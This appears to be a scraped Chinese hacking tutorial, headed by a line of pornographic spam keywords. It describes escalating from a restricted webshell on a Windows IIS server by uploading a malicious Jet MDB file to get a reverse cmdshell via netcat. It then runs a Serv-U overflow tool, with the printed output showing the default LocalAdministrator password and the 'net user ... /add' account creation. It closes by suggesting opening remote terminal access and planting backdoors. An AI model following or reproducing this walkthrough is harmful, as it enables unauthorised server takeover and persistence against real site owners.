欧美性猛交黑人xxxx,成人毛片一区二区三区,久久综合九色综合精品,男的把j放进女人下面视频免费

jet exploit配合WEBSHELL提升權(quán)限

  • 發(fā)布于:2023-10-31
  • 229 人圍觀
   現(xiàn)在管理員安全意識提高了,搞站越來越難了,往往拿到一個WEBSHELL,就不知道干些什么,除了FSO其他組件都不可以調(diào)用,就像這樣的。如圖1

看到了吧,入侵中對我們最有幫助的那3個組件全部刪了,就一個FSO可以用,除非那個管理員是白癡,只刪了組件,而沒有把磁盤權(quán)限配好,很少有這樣的管理員,碰到這種情況,一般就是傳個Serv-u php exploit上去試下看看SERV-U密碼改沒,不過也不是每臺機器都支持PHP的,所以這招也不是很管用,前段時間我弄了個MYSQL WEBSHELL提升都看過吧?必須要得到ROOT密碼才行.最近不是出了個jet數(shù)據(jù)庫溢出嗎?可反彈得到一個cmdshell哦.不過是普通權(quán)限的。但是對于一些只會照著網(wǎng)上資料抄的管理員就N有用啦,雖然他把組件全部都刪了但是,C盤的權(quán)限弄不明白,SERV-U的密碼也是默認的,那就有我們的可趁之機了。好,我們先拿到個CMDSHELL再說吧,至少還能有一點機會.這里先概述一下這這個Microsoft Jet (msjet40.dll) Reverse Shell Exploit:

受影響系統(tǒng):

Microsoft JET DB

不受影響系統(tǒng):

Microsoft JET DB OLE Provider

詳細描述:

Microsoft Jet數(shù)據(jù)庫是MS Office應(yīng)用程序中廣泛使用的輕型數(shù)據(jù)庫。msjet40.dll是Microsoft Jet數(shù)據(jù)庫引擎的主要組件,可以評估并執(zhí)行數(shù)據(jù)請求。

msjet40.dll解析數(shù)據(jù)庫文件時沒有執(zhí)行充分的數(shù)據(jù)驗證,這樣攻擊者就可以修改數(shù)據(jù)庫文件,導(dǎo)致在打開MS Jet數(shù)據(jù)庫時執(zhí)行攻擊者的代碼。
 此信息由HexView提供(EML:vuln@hexview.com)
    存在漏洞的系統(tǒng):
    * Microsoft JET 4.00.8618.0 版
    免疫系統(tǒng):
    * Microsoft JetDB OLE Provider

先用jet.exe生成一個反彈連接的mdb文件如圖2

好了生成好咯,然后我們就通過WEBSHELL傳上去,有時候傳上去,但是卻沒有找到文件,被殺了,把改為ASP后綴. 數(shù)據(jù)庫操作功能比較強的ASP木馬就屬站長助手了。就用它來連接我們的“惡意”MDB文件吧,好上傳成功,如圖3

OK現(xiàn)在我們就開始連接我們生成好的文件咯,為了防止被殺毒軟件XX我改成ASP后綴了.連接之前我們先得監(jiān)聽好端口哦,哪個端口?就是前面設(shè)置的,如圖4

現(xiàn)在開始連接我剛剛上傳的那個文件.如圖5

 

只要沒出現(xiàn)什么災(zāi)難性的錯誤,就表示連接成功了,好,看看我們的NC有反映沒有.如圖6

成功得到一個CMDSHELL,不過權(quán)限是GUESTS組的.這個時候IIS進程已經(jīng)死了,所有的ASP文件都不可執(zhí)行了.所以你得提前把你的工具什么的傳上去.我之前已經(jīng)把serv-u溢出程序傳上去咯,在c:\winnt\system32\inetsrv\data\目錄下 這個目錄默認是EVERYONE完全控制的我想大家都知道,我就不多說.因為都做了權(quán)限CMDSHELL下根本沒法跳到WEB目錄.好了,執(zhí)行我們的SERV-U溢出程序,看看管理員把默認密碼改沒有,啊哈?溢出成功,如圖7

C:\WINNT\system32\inetsrv\Data>ftp 43958 "net user chadmin 520520 /add"
ftp 43958 "net user chadmin 520520 /add"
Serv-u >溢出工具黑貓專版

<220 Serv-U FTP Server v4.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Domain xl:0 Deleted
<505 Domain not found
******************************************************
[+] Creating New Domain...
<200-DomainID=2
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<220 Domain settings saved
200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net user chadmin 520520 /add
<220 Domain deleted
******************************************************
[+] Domain xl:2 Deleted

C:\WINNT\system32\inetsrv\Data>

C:\WINNT\system32\inetsrv\Data>net user
net user

\\QHMEDIASRV 的用戶帳戶

----------------------------------------------------------------
ASPNET                   chadmin                  courses
IUSR_QHMEDIASRV          IWAM_QHMEDIASRV          partner
  SQLDebugger              TsInternetUser

命令成功完成。

C:\WINNT\system32\inetsrv\Data>

沒辦法,還是被搞下了,終究歸于管理員安全意識還不夠高.權(quán)限配得不夠好.后面該怎么樣搞我就不用多說了,終端沒開就給他開個.裝后門,補漏洞。

萬企互聯(lián)
標(biāo)簽: